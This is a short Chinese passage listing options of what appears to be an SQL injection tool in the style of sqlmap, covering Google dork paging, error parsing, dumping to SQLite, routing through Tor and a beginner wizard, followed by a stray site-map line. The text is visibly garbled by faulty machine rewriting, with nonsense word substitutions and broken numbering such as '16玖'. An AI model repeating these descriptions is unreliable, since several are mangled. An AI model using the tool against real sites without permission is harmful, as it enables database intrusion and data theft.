 168. –gpage=GOOGLEPAGE 从钦定的页码使用谷歌(谷歌(Google)) dork 结果  

 16玖. –page-rank 谷歌(Google) dork 结果呈现网页排行(P途达)

  1. –parse-errors 从响应页面解析数据库管理种类的荒唐信息

  171. –replicate 复制转储的数据到一个 sqlite三 数据库  

 172. –tor 使用私下认可的 Tor(Vidalia/ Privoxy/ Polipo)代理地址  

  1. –wizard 给初级用户的简易向导分界面
网站地图xml地图